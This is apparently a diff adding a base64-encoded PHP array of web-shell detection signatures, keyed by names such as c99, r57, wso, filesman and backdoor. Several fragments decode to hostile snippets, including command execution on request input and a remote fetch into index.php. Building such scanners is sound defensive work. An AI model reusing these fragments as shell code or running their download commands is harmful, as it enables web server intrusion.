+RGt2V1VkQmRHSjFjWFo0ZEhwVWNYcDRPVXhKTVZrNE4wa3lVRlJ6UzI1MFVFdFZWVkZqUWxwdFNH +IjtzOjE0OiJjOTlbMl1bMF1bcGhwXSI7czo2NDoia1ZVTGoxbVoyVjBjeWdrWml3Z05EQTVOaUFw +T3dvSlptTnNiM05sS0NBa1ppQXBPd29LQ1hCeWFXNTBJQ0pjYiI7czoxODoiZHhzaGVsbFsxXVsw +XVtwaHBdIjtzOjY0OiJEcThPdHc2WERyY09vdzZVZ3c2L0RzTU91dzZqRHA4T2l3NjdEcThPOHc2 +M0Ryc09qdzY0Z1VFaFFMY09xdzY3IjtzOjE0OiJjOTlbOF1bMF1bcGhwXSI7czo2NDoiZG1Gc2RX +VTlJaTlsZEdNdmMzbHpiRzluTG1OdmJtWWlQbE41YzJ4dlp5QkJlV0Z5YkdGeWFUd3ZiM0IwYVc5 +dSI7czoxOToic3B5c2hlbGxbMV1bMF1bcGhwXSI7czo2NDoiSmNJajRpTGlSMllXeDFaUzRpTHp3 +dlFUNGdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWlMbVJoZEdVb0luSWlMRyI7czoxOToiYmFja2Rv +b3JbMV1bMF1bcGhwXSI7czo2NDoiaUJ2ZEdobGNpQm1jbVZsSUc5eUlHOXdaVzRnYzI5MWNtTmxJ +SE52Wm5SM1lYSmxJR3hwWTJWdWMyVnpMZ29nSyI7czoxNToiYzk5WzI3XVswXVtwaHBdIjtzOjY0 +OiJQRDl3YUhBTkNtVmphRzhnSWp4b016NVhiM0pyY3lFZ1ZYTmhaMlU2SUdjd01HNHVjR2h3UDJj +d01HNDlXME5OIjtzOjE1OiJjbWRbMzBdWzBdW3BocF0iO3M6NjQ6IlYwWlhJbkxBb25jbVZ6WlhR +bklEMCtJQ2RTdzZscGJtbDBhV0ZzYVhObGNpY3NDaWR5Wld4aGRHbDJaU2NnUFQiO3M6MTc6Imhh +Y2tlclswXVswXVtwaHBdIjtzOjY0OiJHVnliWE1OQ2lBZ1EyRnNiQ0J2VXk1U2RXNG9JbmRwYmk1 +amIyMGdZMjFrTG1WNFpTQXZZeUJqWVdOc2N5NWxlIjtzOjE1OiJjbWRbMTVdWzBdW2FzcF0iO3M6 +NjQ6IjJobGNpQnNaWFpsYkhNZ1BDOWthWFkrSUFvZ0lDQWdQQzltYjNKdFBpQUtJQ0FnSUR3dmRH +UStJQW9nSUR4MFoiO3M6MTY6ImMyMDA3WzBdWzBdW3BocF0iO3M6NjQ6ImQwNHlkSFpXUldoTFlt +MW9hVk5JYkZKaFYxSldZbGh3YTJKSGQzcFdSelY0V2pOYWRsUllhREpPVjNONFRtczUiO3M6MTQ6 +Indzb1s3XVswXVtwaHBdIjtzOjY0OiJSVFY2ZUhWellUTXZLM1JxTlRKYVIxWmphRzQ1VGxkcWMw +bHlUM2M1S3k5eWRXWXlSbmhyTVZsa2VtaGlOekJoIjtzOjIwOiJmaWxlc21hblsyM11bMF1bcGhw +XSI7czo2NDoiQ1l1Znk4eVMzaHJLMUpUUkdKUEt5eEtSVnN4WEZjbmNrcEFJMEFtTGl0cmQxY0pa +RzVTVTBSaVdXNVFSVVZNVyI7czoxODoiaW5kZXhlclswXVswXVthc3BdIjtzOjY0OiJ5VHpoMU1s +WTRiMmhLV1VNcllrWnhTbXRvZVZjNGJqSktTa05VWVRkSE4xb3hZbm93ZG1WTFVFNTJka0pHZFdW +IjtzOjE4OiJ3ZWJyb290WzFdWzBdW3BocF0iO3M6NjQ6Ikk4TDI5d2RHbHZiajVjY2x4dUlqc05D +aUFnSUNCOURRb2dJSDBOQ2lBZ1pXTm9ieUFpUEM5elpXeGxZM1ErWEgiO3M6MjI6IkZhVGFMaXNU +aUN6WzBdWzBdW3BocF0iO3M6NjQ6IkF2WjNKbGNDNTBlSFFuTEFvbmJHOWpZWFJsSUdOdmJtWnBa +eTV3YUhBZ1ptbHNaWE1nUGo0Z0wzUnRjQzluY20iO3M6MTU6InI1N1sxNF1bMF1bcGhwXSI7czo2 +NDoiSHBqTUdSbENnb2thbUZ0WlhNd1ltRnpkR1Z5SUQwZ0lqZFlNVGRsT1hFME9IWkVaak5sWmxv +M05rSTJZM2hpVyI7czoxNjoiYjM3NGtbNV1bMF1bcGhwXSI7czo2NDoia2IwNDRhbmRSUVdSRlZs +Y0tWbGt4Y2tWUU9WVnFkMUprV0c5MFpFUkJka0ZrUkU0MFVFbDBOME5HVUc5eFpqYyI7czoxNDoi +ZngwWzNdWzBdW3BocF0iO3M6OTU6ImJiOkpGOWZYMTlmS3lzcGV5UmZYMTlmV3lSZlgxOWZYMTA5 +WTJoeUtDZ2diM0prS0NSZlgxOWZXeVJmWDE5ZlgxMHBMVzl5WkNna1gxOWZXeVJmWDE5ZlgxMHBL +UT09IjtzOjE0OiJwYXNbMF1bMF1bcGhwXSI7czo2NDoiWFNrN0RRb2dJQ0FnSUNBZ0lHVmphRzhn +SWp3dmRHVjRkR0Z5WldFK0lqc2dJQ0FnWkdsbEtDazdEUW9nSUNBZyI7czoxOToiZ3Njc2hlbGxb +MF1bMF1bcGhwXSI7czo2NDoic0lDUjFjR3h2WVdSbWFXeGxLU2tnZXdvZ0lDQWdaV05vYnlBaTFP +RHA2KzRnOC9IdjVmanQ3aURuNE9QdzgrYiI7czoyMToia2Fkb3RzaGVsbFswXVswXVtwaHBdIjtz +OjY0OiJnSUNBZ1BIUmtJSGRwWkhSb1BTSXlNVGtpUGcwS0lDQWdJQ0FnSUNBOFptOXVkQ0J6YVhw +bFBTSXRNeUlnWm1GIjtzOjE1OiJzcGFtWzNdWzBdW3BocF0iO3M6NjQ6Ikl3VFdwcWNUQlRkSEps +Y0daUVdVb3pjVzkwZG5remEzUkxhMDgzTjJoV09YZzJUQzgxVW5VMWEwbFZSV0oyT0QiO3M6MTU6 +ImM5OVsxM11bMF1bcGhwXSI7czo2NDoiZUZNNUszaDFkREl3VWtWRVlXWnJRbUZOYVVSMFNVTkVk +RTFEUkhSNVMxQkpkbXcxUlRaUGVWZFlNMFJHWm5aSyI7czoxNToiYzk5WzE3XVswXVtwaHBdIjtz +OjY0OiJHRnNiRzkzTEdSbGJua0tJQ0FnSUVGc2JHOTNJR1p5YjIwZ1lXeHNDand2Um1sc1pYTStD +Z29qSUUxaGEyVWdMIjtzOjMwOiJodGFjY2Vzc19zaGVsbFswXVswXVtodGFjY2Vzc10iO3M6NjQ6 +ImdQejgvUHo4L1B6OC9QeUJ6YUdWc2JDMC9QejgvUHo4Z0tEOC9QejgvSUQ4L1B6OC9QejhzSUQ4 +L1B6OC9JRDgiO3M6MTU6ImM5OVsyNV1bMF1bcGhwXSI7czo2NDoiSUhaaGJIVmxQU0pGYm5SbGNp +SStDand2ZEdRK1BDOTBjajRLSkhSbGJtUUtTRlJOVERzS0NtbG1JQ2hwYzNObCI7czoxOToia2F1 +c2hlbGxbMF1bMF1bcGhwXSI7czo2NDoiRzlFTURCT1RuSldUMlpPZEZrcmVIRjVOMDR6UVdkbVNW +ZGlhMHMyZWtrdlkxbFFaM0oxVm5wWGVrc3hORkpvTyI7czoyMDoiZGFya3NoZWxsWzFdWzBdW3Bo +cF0iO3M6NjQ6ImdQSFJrSUhkcFpIUm9QU0kxTUNVaUlHaGxhV2RvZEQwaU1TSWdkbUZzYVdkdVBT +SjBiM0FpSUdKblkyOXNiM0kiO3M6MjM6InN0cmVzc2J5cGFzc1sxXVswXVtwaHBdIjtzOjY0OiJ5 +SUZObGNuWmxjaUJwYm5SeWRYTnBiMjQ4TDI5d2RHbHZiajROQ2p4dmNIUnBiMjRnZG1Gc2RXVTlJ +akUxSWlBIjtzOjE4OiJtYWRzcG90WzBdWzBdW3BocF0iO3M6NjQ6IlRUWnBVa2d6VlVWUWREWnpa +QzlaY1dGWVlqaHZiVEF6ZUdKMWNVWk5hVzlRWTNsVmRrdFFOblpUVW5wamNXMXAiO3M6MTk6ImZp +bGVzbWFuWzBdWzBdW3BocF0iO3M6NjQ6Ik5sSUdZdVlYUjBjbWxpZFhSbGN3MEtZMkZ6WlNBd0RR +cEdiMnhrWlhKQmRIUnlhV0oxZEdWeklEMGdJazV2Y20iO3M6MjI6ImVsbWFsaXNla2VyWzBdWzBd +W3Zic10iO3M6NjQ6ImhaRGQ0Y1M4ME55dGlaMGx4VDFNeGRtWnBjV2Q0YW10ek1FRkVOa2xJWTJo +a00zcFZXRGM1ZG5Gd1ZGZGxVeloiO3M6MTU6ImM5OVsyMF1bMF1bcGhwXSI7czo2NDoiU2lzNGEy +MTZZa3hsYm1aQmVuQkhjVFpsVml0cWRrZHFkazg0VDBKTlVubGFVVE55YzNCdGRDczFUeTlaYXpC +YSI7czoxNToicjU3WzE4XVswXVtwaHBdIjtzOjY0OiJZV1FnWkdGMFlRb0phV1lvSkVWT1Zuc25R +MDlPVkVWT1ZGOVVXVkJGSjMwZ1BYNGdMMjExYkhScGNHRnlkRnd2IjtzOjE2OiJ0ZWxuZXRbMV1b +MF1bcGxdIjtzOjY0OiJQU2N3TkNjN0lHSnlaV0ZyT3cwS0NRa0pDV05oYzJVZ0p6VW5PaUFnSkdS +aGRHVTlKekExSnpzZ1luSmxZV3M3IjtzOjIwOiJmb3JldmVycHBbMF1bMV1bcGhwXSI7czo2NDoi +YVhwbElsMDhKRjlRVDFOVVd5Sk5RVmhmUmtsTVJWOVRTVnBGSWwwcENpQWdJQ0I3Q2lBZ0lDQWdJ +R2xtS0cxdiI7czoyMjoicGhwYmFja2Rvb3JbMV1bMF1bcGhwXSI7czo2NDoiWld4c1BDOTBhWFJz +WlQ0OGJXVjBZU0JvZEhSd0xXVnhkV2wyUFNKRGIyNTBaVzUwTFZSNWNHVWlJR052Ym5SbCI7czoy +NToiYW50aWNoYXRfc2hlbGxbMV1bMF1bcGhwXSI7czo2NDoiWlEwS0NRa0pDVkpsYzNCdmJuTmxM +bGR5YVhSbElDSThabTl1ZENCbVlXTmxQU0lpWVhKcFlXd2lJaUJ6YVhwbCI7czoyMToic21hcnRz +aGVsbFswXVswXVthc3BdIjtzOjY0OiJWa0p5QTlQaUFpUkdsemMyVWdabWxzWlhJZ1pYSWdhMjl3 +YVdWeVpYUWdkR2xzSUZ3aVd5VXlYVndpT2x4dVd5IjtzOjE5OiJ3ZWJhZG1pblsyXVsyXVtwaHBd +IjtzOjY0OiJNR2MxY2l0cVVXUjZWR3hyTW5kWWFWY3dkMGgxYUZCTmVUSkJSME5wVFdzdmVrNUNU +RFpyTlhGV1Mwc3dTbTVVIjtzOjE3OiJiMzc0a1sxN11bMF1bcGhwXSI7czo2NDoiUEQ5d2FIQUtM +eXBqT0RZME9XRTVZVEUyTlRObU9EVXlPRFF6WmpRMFpqa3hObUpqWWpRMFpDb3ZhV1lvYVhOeiI7 +czoxNToiY21kWzE0XVswXVtwaHBdIjtzOjY0OiJGVTNOVlEzUWpKeVJUSTJPVWQ0Y0hCRmRqWjNS +Rzk1WVNzeGRFNUNkVlZXVURSSFYwRlZMM1p2ZVUxNE1WZ3hXIjtzOjIwOiJwaHBzaGVsbFsyNl1b +MF1bcGhwXSI7czo2NDoicElIc05DaUFnSUNBZ0lDQWdjSEpwYm5RZ0lrWnBiR1U2SWk0Z0lHSmhj +MlZ1WVcxbEtDQWtYMFpKVEVWVFd5ZCI7czoyMDoiaXJvbnNoZWxsWzFdWzBdW3BocF0iO3M6NjQ6 +Ik5OV1dwU04wbFVaVFEwWkd0VmMyOUlibmhFV1dNNFpIbHhjbUoyWkdKdGFpdHFZMjg1ZVdOV01t +dHJVa3BIUmsiO3M6MjI6ImJvZ2VsX3NoZWxsWzFdWzBdW3BocF0iO3M6NjQ6ImlLU0I3RFFvSkNR +a2tjbVZ6ZFd4MFBYTm9aV3hzWDJWNFpXTW9KRjlRVDFOVVd5ZGpiMjF0WVc1a0oxMHBPdzAiO3M6 +MTU6ImVybmVbMl1bMF1bcGhwXSI7czo2NDoiSUFwT1lXMWxPand2Wm05dWRENDhMMlJwZGo0Z0Nq +d3ZkR1ErSUFvOGRHUWdkMmxrZEdnOUlqTXhOeUlnWW05eSI7czoyNDoibW9yb2NjYW5fc3BhbVsw +XVsxXVtwaHBdIjtzOjY0OiJ2Wm05eWJUNDhMM1JrUGp3dmRISStEUW84TDNSaFlteGxQZzBLUEdK +eVBqeGthWFlnWTJ4aGMzTTlZbUZ5YUdWIjtzOjIzOiJhbnRpc2Vjc2hlbGxbMV1bMF1bcGhwXSI7 +czo2NDoiT1EybEJaMGxEUVdkSlEwRm5TVU5CWjBsRFFXZEpRMEZuU1VOQlowbERRV2RKUTBGblNV +TkJhMk5IZEcxT1JGWiI7czoxOToiY21vc19jbHJbMF1bMF1bcGhwXSI7czo2NDoiSUR3dlptOXVk +RDROQ2lBZ0lDQWdJQ0FnSUNBZ0lDQWdQRDl3YUhBZ0RRb3ZMeUJEYUdWamF5Qm1iM0lnVTJGbSI7 +czoxOToiczcyc2hlbGxbMV1bMF1bcGhwXSI7czo2NDoicE93b2dJQ0FnSkhWa0lEMGdkWEpzWlc1 +amIyUmxLQ1JrYVhJcE93b2dJQ0FnSkhWMklEMGdkWEpzWlc1amIyUiI7czoxNToiYzEwMFsxXVsw +XVtwaHBdIjtzOjY0OiJjbXNnUFNCVFpYSjJaWEl1UTNKbFlYUmxUMkpxWldOMEtDSlhVMk55YVhC +MExrNWxkSGR2Y21zaUtRb0pDVk5sIjtzOjE3OiJyaHRvb2xbMF1bMF1bYXNwXSI7czo2NDoiOEwz +UmtQaWNwT3dvSkNRa0pDUWx3S0NjOGRHUStKeTRrY205M1d5ZFRaWEZmYVc1ZmFXNWtaWGduWFM0 +blBDOSI7czoxNzoicGhwc3B5WzNdWzBdW3BocF0iO3M6NjQ6IkNCbWIzSmxZV05vSUNna1lXeHNU +R2x1YTNNZ1lYTWdKR3RySUQwK0lDUjJkaWw3SUNSaGJHeEViVzV6VzEwZ1AiO3M6Mjc6ImJydXRl +X2ZvcmNlX3Rvb2xbMF1bMF1bcGhwXSI7czo2NDoiZktDMG9MQ2hkS0RvcmZDZzZMVjhvTENnNktE +b29YU2hkTENZb1h5aGZLR0F0WGlnc0tEb29MaWhkS0Ywb1hpZyI7czoyMDoicGhwc2hlbGxbMzFd +WzBdW3BocF0iO3M6NjQ6IkRCbmFFSklSRzVhSzJsSlJFdEdla2RTZVZSalpFNUJXRWQxTUUwNWVr +WnVVMFUzY1dKRldVWm5lRGRuUjJvd04iO3M6MTU6ImM5OVsyMl1bMF1bcGhwXSI7czo2NDoiaGMz +TXBLU0I3Q2lBZ0lDQnBaaWhwYzNObGRDZ2tYMUJQVTFSYkozQmhjM01uWFNrZ0ppWWdLRzFrTlNn +a1gxQiI7czoxNDoid3NvWzRdWzBdW3BocF0iO3M6NjQ6IkxNbUpvYlRFelFrTkxka0pGWm5wdE5V +czFUMHgyWTNwalFsRnJUbTVpVDJweVpqbFZjRFk1VlVKM1QwOTRNQzkiO3M6MTU6InI1N1sxMF1b +MF1bcGhwXSI7czo2NDoiVE1XOEtOak50TVc0dmMyRnpaMjVrV0hwV1REUlpSVUZ6VUZWWFpUWnJa +M1ZwWVZNeFNHRklaRlpEZEFvemFDcyI7czoxOToic2VjNGV2ZXJbMF1bMF1bcGhwXSI7czo2NDoi +MFJtaHpiMGhzYTNKc1lVWXdaMFY2SzBka2FFTkZkRU5oUVdsWmFXTnFVMHRaVjNOblYwdHpVSFZV +VEc5TFRWUiI7czoyNToic2hlbGxfdXBsb2FkZXJbNl1bMF1bcGhwXSI7czo2NDoiVlU4dk5FdExh +elV2SzNWSlQxTmtjM2hsT1dKaWNHSTVNRkJQUm1wQ1dtMW5ZbkZzZG1WT1RrOTJhMnd5Vm1sRiI7 +czoxNDoid3NvWzZdWzBdW3BocF0iO3M6NjQ6ImN5QmhJR052Ym5ObGNYVmxibU5sSUc5bUlIVnph +VzVuSUhCbFpYSXRkRzh0Y0dWbGNpQjBjbUZ1YzIxcGMzTnAiO3M6MTk6ImZpbGVzbWFuWzJdWzBd +W3BocF0iO3M6NjQ6IjBLYVdZb0lXVnRjSFI1S0NSZlVrVlJWVVZUVkZzbmJtVjNabWxzWlNkZEtT +bDdabWxzWlY5d2RYUmZZMjl1ZEciO3M6MTc6ImphY2thbFszXVswXVtwaHBdIjtzOjY0OiJNajRt +Ym1KemNEc2lMaVIyWVd4MVpYTXVJaVp1WW5Od096d3ZabTl1ZEQ0OEwzUmtQand2ZEhJK0lqc05D +aUFnIjtzOjE0OiJyNTdbN11bMF1bcGhwXSI7czo2NDoiYzRZMEpHTDNraUxDSm1VVzVGZUZaQ09D +dEVOVmRFTlhvNFVtOGlMQ0oyVmpjNE9EbGtabWRSYWxGcWFXaENMeiI7czoyMDoicGhwc2hlbGxb +MTRdWzBdW3BocF0iO3M6NjQ6Ik56UTBMRE13TERNNE56RXNNallzTXpJNE15dzFNeXd5TkRnMUxE +VTBMRGsxTkRrc05UVXNPRFE0TXl3MU9Td3kiO3M6MTk6IndlYnNoZWxsWzFdWzBdW3BocF0iO3M6 +NjQ6IkFvZ1lYSnlZWGtvSWp4aVBsdFRVVXhkUEM5aVBpSXNKSE4xY213dUltRmpkRDF6Y1d3bVpE +MGxaQ0lwTEFvZ1kiO3M6MjA6InBocHNoZWxsWzE3XVswXVtwaHBdIjtzOjY0OiJJQ1JzYVc1bEtR +MEtJQ0FnZXcwS0lDQWdJR2xtSUNnaFpXMXdkSGtvSkd4cGJtVXBLUTBLZXcwS1pXTm9ieUFpIjtz +OjE1OiJjOTlbMTBdWzBdW3BocF0iO3M6NjQ6IjVRMmR2WjJGWFdXOUtSamxSVkRGT1ZWZDVaRzFp +TTBwMFdESkdhbVJIYkhaaWFXUmtTVVF3T1VsRVJXZExVVzkiO3M6MTg6Im1ydGlnZXJbMF1bMF1b +cGhwXSI7czo2NDoiVXRrZG1wWFZEVTJSMjRyVjJKSlZrVjZVVXBzSnl3bmIzWTVkazVpVTJaNU1F +MTVabkZWVlhRMmRIQkdTeWNzSiI7czoxNToiZW1wb1swXVswXVtwaHBdIjtzOjY0OiJWaE9iRTVx +VW1aYVIxWnFZakpTYkV0RFVtWlZSVGxVVmtaemFWa3lPV3RhVTBwa1MxTnJOME51TUQwbk95QUtJ +IjtzOjE1OiJjbWRbMjVdWzBdW3BocF0iO3M6NjQ6IkxWV3R5U2psQ2JYQjJjRW96Yldndk1tNTRP +RVpzTUdZMVlsUkdPSGd2ZVhjd2NFdFhVbEpEYnl0bVpsVlJkR1YiO3M6MTU6ImM5OVsxNF1bMF1b +cGhwXSI7czo2NDoicE9VakJvTkRSTWRESTBUREZ2WVd3d2NXSXZaRFEwY1ZOb2NXdzBNMDVQVlc1 +dU1uUXlVWGRFWmtWclpIRnhVaiI7czoyMDoiZmlsZXNtYW5bMjZdWzBdW3BocF0iO3M6NjQ6IjlC +Umk5RWQzWlphalEyUVdvNGIwUkpTVU5PUlZCc1RtTkZVV3RMUjBGR1pVNTVXbHBvWkVZM1FucGFV +bGgzWWoiO3M6MTQ6Indzb1syXVswXVtwaHBdIjtzOjY0OiJpSXBLU0I3SUEwS0lDQWdJQ0FnSUds +bUlDaHBjMTl5WldGa1lXSnNaU2drWkdseWVpa3BJSHNnRFFvZ0lDQWdJIjtzOjIwOiJjb25maWdz +cHlbMF1bMF1bcGhwXSI7czo2NDoiMlY0WldOMWRHbHZibDl0WlhSb2IyUW9LUXA3Q2lBZ0lDQnBa +aWhtZFc1amRHbHZibDlsZUdsemRITW9KM0JoYyI7czoyMDoiaXJvbnNoZWxsWzNdWzBdW3BocF0i +O3M6NjQ6InNlRFJOVjFZMldXeDRORTFVVm1ObFJFRXhXRWhuZDFsV2VEUk5WMUpqWlVSUmQxWldl +RFJOVkZrelZWWm9ZMlYiO3M6MjI6Impvb21sYV9zcGFtWzBdWzFdW3BocF0iO3M6NjQ6IlBEOXdh +SEFLTHlwbFl6QXhPVEppTTJGbE5qa3lOREV3T0RsbU5HSTJZbVExWkRZNE5EZzBOQ292YVdZb2FY +TnoiO3M6MTU6ImNtZFsxMV1bMF1bcGhwXSI7czo2NDoiQ2NzSUNSMGFHVnpaVDBuSnlrZ0x5b2dS +WEYxWVd3Z2RHOGdSSGhWVWt3b0tTd2dZblYwSUhCeWFXNTBjeUJ2ZCI7czoxODoiZHhzaGVsbFsw +XVswXVtwaHBdIjtzOjY0OiJWRlVNVTVWVjNsa2QwMXBaR1JNUTBGclpFZFdkR05EYTNCbGR6QkxR +MUZyU2tOWFZtcGhSemhuVVVkYWNHSkhWIjtzOjE5OiJ2MGxkM20wclsxXVswXVtwaHBdIjtzOjY0 +OiJaV1FnWENJa1ptbHNaVndpUEdKeVBpSTdEUW9nSUNBZ0lDQWdJQ0I5RFFvZ0lDQWdJQ0FnSUdW +amFHOGdJanhtIjtzOjE5OiJzYWZlbW9kZVs1XVswXVtwaHBdIjtzOjY0OiJaaWhtZFc1amRHbHZi +bDlsZUdsemRITW9KM041YzNSbGJTY3BLU0I3RFFvZ0lDQWdJQ0JBYjJKZmMzUmhjblFvIjtzOjIy +OiJGYVRhTGlzVGlDelszXVswXVtwaHBdIjtzOjY0OiJTaWNzSjFKalFXNHhTMGhpUm1Wek9HRmtl +WFZJT1Njc0owaG9WaTgxWWtKRlpGWkhOVEJ6VjNObGF5Y3NKek0xIjtzOjE3OiJub25hbWVbMF1b +MF1bcGhwXSI7czo2NDoiRnVQU0l6SWo0bWJtSnpjRHM4SlQxbGJuWXVjWFZsY25sSVlYTm9kR0Zp +YkdVb0ltOXpMbTVoYldVaUtTVStJRCI7czoyMzoianNwd2Vic2hlbGxbMV1bMF1bamF2YV0iO3M6 +NjQ6IkgwTkNpNXNhWE4wYVc1bklIUm9MbkJsY20xcGMzTnBiMjRnZXlCMFpYaDBMV0ZzYVdkdU9p +QnNaV1owSUgwTkMiO3M6MTk6IndlYmFkbWluWzVdWzJdW3BocF0iO3M6NjQ6InFPRzVUUzBoWE56 +ZHFTVVZPY2tSU1ptdEZPVTlyWldGbFVUaHdWVlJKZEZCM2JFVk9VSEZvU1hCVmFtdzJUMWwiO3M6 +MTQ6Indzb1s4XVswXVtwaHBdIjtzOjY0OiIxd095QlZjMlZ5Y3lBOEwzQStEUW84Y0NCamJHRnpj +ejBpYzNSNWJHVXhJajVDZVhCaGMzTThMM0ErRFFvOGNDIjtzOjE3OiJ1czNyc3BsWzBdWzBdW3Bs +XSI7czoxNTI6IitJR2x1WkdWNExuQm9jQ2NwT3cwS1FHVjRaV01vSjJabGRHTm9JQzF2SUdsdVpH +VjRMbkJvY0NCb2RIUndPaTh2YUdKaVlpNWpiMjB1WVhVdkxpNHVMMmx1TG5SNGRDY3BPdzBLUUdW +NFpXTW9KMGRGVkNCb2RIUndPaTh2YUdKaVlpNWpiMjB1WVhVdkxpNHVMMmx1TG5SIjtzOjI1OiJz +aGVsbF91cGxvYWRlclswXVswXVtwaHBdIjtzOjY0OiJHbHZiajBpUDNrOVBEOXdhSEFnWldOb2J5 +QWtjSGRrT3lBL1BpWmhiWEE3ZUQxMWNHeHZZV1FpSUdWdVkzUjVjIjtzOjIwOiJtMW4xc2hlbGxb +MF1bMF1bcGhwXSI7czo2NDoiTFZVSnNaVWRXYWt0RFVtcGlWMUZ3VDNkdlNscFhlSHBhVjJ4dFMw +ZGFNV0p0VGpCaFZ6bDFXREpXTkdGWVRqQiI7czoyNjoic2hlbGxfdXBsb2FkZXJbMTRdWzBdW3Bo +cF0iO3M6NjQ6InpTR2wxUzFoTk0xbGlhMFUxYjNsaGNHUnVkRWxaT1N0cWJrVkJUblpIYnpGcGJt +eERUWHBrWmlzMmMzQnBVVTUiO3M6MjA6InBocHNoZWxsWzIwXVswXVtwaHBdIjtzOjY0OiJ6OC9Q +ejhuTEFvbmNuVmZkR1Y0ZERZbklEMCtKejgvUHo4L1B6OC9QeUEvUHo4L0p5d0tKM0oxWDNSbGVI +UTNKIjtzOjE0OiJyNTdbNV1bMF1bcGhwXSI7czo2NDoiWmlCdVlXMWxQU0o0Y0NJK0RRb05DZzBL +UEQ5d2FIQU5DZzBLRFFvZ0lDQWdJQ0JwWmlBb0pGOUhSVlJiSjNWeiI7czoxNzoiY3BhbmVsWzBd +WzBdW3BocF0iO3M6NjQ6IklnZG1Gc2RXVTlJaWN1YUhSdGJITndaV05wWVd4amFHRnljeWdrWm1s +c1pTa3VKeUkrUEdsdWNIVjBJSFI1Y0ciO3M6MTc6ImNwYW5lbFsxXVswXVtwaHBdIjtzOjY0OiJt +aHNhVzVMS0NKelpVTTlhR1Y0Sm1acGJFVTlKR1p1Sm5kdmNtdHBibWRrYVZJOUpHTjNaQ0lwTGlK +Y0lqNUlaIjtzOjE3OiJqYWNrYWxbMl1bMF1bcGhwXSI7czo2NDoiTm1KallXSTBOVE15WldJNE5U +UmxJQTBLSkdOdmJHOXlJRDBnSWlNd01FWkdOallpT3drdkwwTnZiRzkxY2cwSyI7czoyMDoiZmls +ZXNtYW5bMTFdWzBdW3BocF0iO3M6NjQ6IjZJRVpCVEZORk95QjlEUXBtZFc1amRHbHZiaUJuWlhS +a2FYTm1kVzVqS0NrZ2V5QWtjbVY2SUQwZ1pYaHdiRzkiO3M6MTk6ImlwYXlzNzc3WzBdWzBdW3Bo +cF0iO3M6NjQ6Ikhka1dqUkZMMWx2ZUZVd2NtOVFVRmhqUjBSR2MzRkVhR0ppVVdwU1pWRmlTVzVz +SzBSemFuSkdaVkF5TVN0cVYiO3M6MjA6InBocHNoZWxsWzI0XVswXVtwaHBdIjtzOjY0OiJ6SUhk +cGRHZ2dkWE5sY2pvZzNzZkc0K1VneCtIajVzZmUyaURqMmlESDArTWc3ZWJTMGNmSzVjYzhMMlp2 +Ym5RIjtzOjE4OiJzeW1saW5rWzBdWzBdW3BocF0iO3M6NjQ6Imx4dUlqc05DZ2tKWldOb2J5QWlQ +QzkwY2o1Y2JpSTdEUW9KZlEwS0RRb0paV05vYnlBaVBDOTBZV0pzWlQ0aU8iO3M6MTY6Im15c3Fs +WzldWzBdW3BocF0iO3M6NjQ6ImgwV0ZneWNsRnVabEJYY1ZaYU1HVnpTR2x0UkhJeVpHdHRLelYz +WW1wdWFqSnFVbnB2Um1KYVVubE1ha1ZzUTIiO3M6MjA6InBocHNoZWxsWzI1XVswXVtwaHBdIjtz +OjY0OiJUWEJQZHowOUlqc2dEUXBsZG1Gc0tHSmhjMlUyTkY5a1pXTnZaR1VvSkdsdWFtSjFabVlw +S1RzTkNpOHFJR041IjtzOjE1OiJ3c29bMThdWzBdW3BocF0iO3M6NjQ6Ik5HUmtaR1JrWWlJRzl1 +UTJ4cFkyczlJbVJ2WTNWdFpXNTBMbWRsZEVWc1pXMWxiblJDZVVsa0tDZDBZMjlzYjMiO3M6MjA6 +ImNvbnN0YW5jZVswXVswXVtwaHBdIjtzOjY0OiI3ZTQ2UEdKeVBqeDBaWGgwWVhKbFlTQnliM2R6 +UFRnZ1kyOXNjejA0TUQ0aUxtSmhjMlUyTkY5bGJtTnZaR1VvIjtzOjE5OiJuaXhzaGVsbFswXVsw +XVtwaHBdIjtzOjY0OiJJRzkxZEhObGREc0tRazlTUkVWU0xVeEZSbFE2SUNBZ0l6azNRekk1TmlB +eGNIZ2diM1YwYzJWME93cENUMUpFIjtzOjE0OiJyNTdbMV1bMF1bcGhwXSI7czo2NDoialFDWitM +RkJRTmtkRUxHc25PSDVQVnl3NmJUWkFJMEFtZm40c1VINVFMSDU0YlRwdWVFczBUR2t5WGxkRFRt +TiI7czoxNjoiZWZzbzJbMF1bMF1bYXNwXSI7czo2NDoiMU5GVWxaRlVsc25SRTlEVlUxRlRsUmZV +azlQVkNkZElEMGdjM1J5WDNKbGNHeGhZMlVvSUNkY1hDY3NJQ2N2SiI7czoyNToicGhwZmlsZW1h +bmFnZXJbNV1bMF1bcGhwXSI7czo2NDoiVjFrMFpsUjFRazlTYzI5YWIwOHlUekJZZFdVclFWQjNU +a1pYWlhSQ1RVNVdUVzVESzBkc1JHbGhSMEZrWldGTCI7czoyMDoiYWwtbWFyaHVtWzFdWzBdW3Bo +cF0iO3M6NjQ6IjJhbEZHZFRrM2ExWTBTVFJhYmsxdFRXdHhRamRDZW1SM1ZtOURibE5aVkdkRVRU +aFpOME5tVkhsaVVWTmxNMGQiO3M6MjA6ImZpbGVzbWFuWzE4XVswXVtwaHBdIjtzOjY0OiJYSnli +M0lvSWs1dklHTnZibVpwWjNWeVlYUnBiMjRnWm1sc1pYTWdabTkxYm1RaElpazdDaUFnSUNCOUlH +VnNjIjtzOjE3OiJ0ZWFtcHNbMF1bMF1bcGhwXSI7czo2NDoid0EvQUQ4QVB3QWdBRDhBUHdBL0FE +OEFQd0EvQUQ4QVB3QS9BRDhBUHdBZ0FDY0FJd0FuQUNrQUlnQXNBQUFOQyI7czoyMToicmVtb3Rl +dmlld1syXVswXVtwaHBdIjtzOjY0OiIxWlQwek1qNUJjbU5vYVhabElpa0tjbVZ6Y0c5dWMyVXVk +M0pwZEdVb0lqeGljajQ4YVc1d2RYUWdkSGx3WlQxIjtzOjIyOiJlbG1hbGlzZWtlclsxXVswXVt2 +YnNdIjtzOjY0OiIyNXNiMkZrWENJK1BDOW1iM0p0UGp3dlpHbDJQaUk3Q2dvS0NtVmphRzhnSWp4 +a2FYWStQRVpQVWswZ2JXVjBhIjtzOjE5OiJ3ZWJzaGVsbFsyXVswXVtwaHBdIjtzOjY0OiJjRTk1 +UW14Wk1taDJTVU5qT0V3elVteGxTRkpvWTIxV2FGQnBZemRtVVRCTFdsZE9iMko1UVc1UVIxcDJZ +MjB3IjtzOjIzOiJzaW1wbGVfc2hlbGxbMF1bMF1bcGhwXSI7czo2NDoibnBzYVdJNkx5OGlMaVJt 